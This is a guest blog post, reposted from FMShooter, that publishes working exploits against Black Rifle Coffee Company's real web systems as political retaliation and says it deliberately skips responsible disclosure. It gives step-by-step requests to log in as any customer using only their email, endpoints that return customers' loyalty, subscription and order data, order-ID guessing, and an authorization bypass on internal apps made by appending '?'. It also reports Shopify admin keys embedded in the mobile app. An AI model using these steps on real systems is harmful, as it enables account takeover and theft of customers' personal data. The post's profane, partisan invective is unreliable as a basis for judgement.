Originally Posted at FMShooter – Authored by Catboy
[Guest Post] Catboy is a conservative zoomer in his early twenties with years of experience in software engineering, application+network security, and product design. He currently works in financial tech in New York City.
Let’s start with the big reveal, if you have ever had an account with Black Rifle Coffee Company, or have ever placed an order with them, your personal information is at risk. This does NOT include passwords and payment data (to my knowledge).
The Black Rifle Coffee Company is once again getting headlines over its treatment of Kyle Rittenhouse, the 17-year-old hero who shot two criminals (one of whom being a serial child rapist) dead and took a bicep off another. BRCC’s CEO, Evan Hafer, liked a Tweet calling Rittenhouse a “LARPer,” a “punk ass,” and “a wannabe douchebag.” He called those protecting their private property from rioters “repugnant.” He has also been caught donating to Act Blue, and Barack Obama:
As Black Rifle Coffee blocks conservatives, it's important to understand that CEO @EvanHafer hired ActBlue Dem donors to run his IT and social media. pic.twitter.com/XfncLVYN1e
— John – Pinochet Aviation Academy Grad – Cardillo (@johncardillo) July 19, 2021
Whenever a company pulls something like this, I like to take a quick look at their network infrastructure and security, in hopes that I get to write a blog post like this. As a summary, in case you don’t want to read the entire in-depth analysis of their network:
- All BRCC customer data has been breached, excluding passwords (handled by Shopify) and payment data (handled by stripe)
- You can login as any BRCC customer without their password. You can edit profiles, place orders, and edit subscriptions just by knowing their email.
- You can brute force customer emails using an internal API for looking up orders. This also includes (partial) payment data, tracking numbers, and more identifiers
- You are able to see every time an employee discount is used, without logging in.
- You could fuck with their custom Shopify integrations, but this probably won’t do much
- Other unsolved discoveries include
- Figuring out other internal BRCC tools (*.apps.blackriflecoffee.com)
- Some potential querying endpoint: https://data.blackriflecoffee.com/
- Some potential querying endpoint: https://apps.customers.blackriflecoffee.com/
- B2B sales platform: https://dealer.blackriflecoffee.com
Usually, this kind of exploit would be reported through HackerOne, or another kind of bug bounty program. This kind of program would report the exploit to the company directly so they could fix it before a blog post about it is published, and would award a cash prize to whoever found the bug. However, as BRCC didn’t give Kyle a chance for his case to be heard before damning him, we, in turn, are not waiting to divulge this exploit or go through any responsible disclosure process. Call it karma.
A Warning
🛑 Do not perform these steps yourself unless you are well-versed in keeping your online identity secure. These are provided for security researchers to explore, and are for educational purposes only. These tutorials assume basic knowledge of application development. For anyone else, just look at the pictures.
A Prerequisite
🛑 Do not use information retrieved via the exploits to steal BRCC’s customer data. Their customers are not at fault here.
A Big Update
After completing this article, I took a look into the BRCC mobile application, not expecting to find anything. To my surprise, they embedded their Shopify admin keys inside their public mobile application, so if you have the mobile app installed, admin access to Black Rifle Coffee exists on your device.
These keys cannot be used to edit their customer-facing website unfortunately, but they can be used to create/edit/delete orders, subscriptions, and customers. Also note the Stripe keys here are not sensitive and are usually included in frontend applications. They are the exception. I redacted the ReCharge keys as too much of them were exposed in the screenshot.
Also embedded are keys to their subscription platform, RechargeApps, an old (?) notification platform, Shopistry, and a custom application for push notifications, located at https://black-rifle-coffee.herokuapp.com. Each of these require more investigation.
The Exploits
1. Login as Any Customer
This one is so easy to perform that it is incredible it has not been found before.
- Send a POST request to https://account.blackriflecoffee.com/login with a JSON body consisting of `{“email”: “[email protected]”}`
- You will receive a URL as a response.
- (optional) – This URL contains a Shopify Multipass token, exchange that multipass token for a regular Shopify access token using the Shopify REST API.
- (optional) – on account.blackriflecoffee.com, set your `shopify_customerToken` cookie to be the regular Shopify access tokenYou now have access to any user’s account.blackriflecoffee.com account.
- Click the URL
- You will now be in a hidden internal BRCC tool with the user’s profile pulled up. You can make any edits you would like.
From here, you can edit profiles, place orders, edit subscriptions, edit addresses. Free coffee, I guess? Their coffee is kinda shit though, so this is mostly for fun.
2. See Detailed Customer Data
- Send a GET request to one of the following, replacing the email in the URL with any BRCC customer:
- https://account.blackriflecoffee.com/api/loyalty/customer/[email protected]
- https://account.blackriflecoffee.com/api/subscription/customer/email/[email protected]
3. See Detailed Order Data
- Send a GET request to https://account.blackriflecoffee.com/api/order/2760367571053. It may take a few tries to generate valid order IDs, but you can write a program to do this automatically.
4. Get a Bunch of Valid Order IDs
For some context, there are a bunch of internal tools BRCC uses to communicate between Shopify and their own systems. One such tool is located at https://apps.empdiscount.blackriflecoffee.com/. Note that this might give you an “Unauthorized” error, but you can quickly get around that by adding a `?` to the URL to fake a query parameter. So https://apps.empdiscount.blackriflecoffee.com/?. Lol.
Here you can get the details of anyone who has ever used an employee discount code. It’s in a UI so no instructions needed.
5. Fuck Around
There are a bunch of other internal apps like the employee discount one. They don’t do anything special, but I’m sure it breaks something, somewhere:
- https://apps.inventory.blackriflecoffee.com/?
- https://apps.inventory.blackriflecoffee.com/?
- https://apps.ghfulfillment.blackriflecoffee.com/?
- https://apps.fulfillment.blackriflecoffee.com/?
- https://apps.stickerclub.blackriflecoffee.com/?
- Note: This one used to contain a log of every customer, but it seems to have been removed as of writing
There are others, but there isn’t a traditional UI attached to them so they will need further investigation by others who have time on their hands
Conclusion
Seems to me that Evan Hafer and the rest of BRCC should spend less time attacking minors on Twitter, and more time ensuring their customers are safe while shopping for their sub-par coffee.
Personally, I prefer https://stockingmillcoffee.com/ (https://twitter.com/smcroasters)
If you’re a security researcher who has found something else related to BRCC, feel free to reach out, and we’ll update this article and credit appropriately.
Editor’s note: Black Rifle Coffee Company should be extremely thankful that Catboy has the goodness in his heart not to abuse their very visible exploits in their website and payments processing, instead choosing to publicly share his findings via a blog post. A worse human being would have extracted all possible data and sold it to the highest bidder. A slightly less worse human being would have changed every customer’s name before mass placing orders to all of them indicating their true feelings for BRCC and Evan Hafer:
If BRCC had just spent less time and money commenting on politically charged court cases and contributing to political super PACS, they may have had the resources to develop a customer-facing website that wasn’t a complete security-riddled piece of shit, and Catboy would never have been able to write this post at all. This blog may not have much reach, but if Hafer or any BRCC employees ever get a chance to view this post, they should take it as a humbling experience and a learning lesson to not piss all over your customer base. More likely, he will cry like a pansy, and blame “the Drumpftards” for daring to take a cursory look at his disdain for not only his customers, but his customer security.
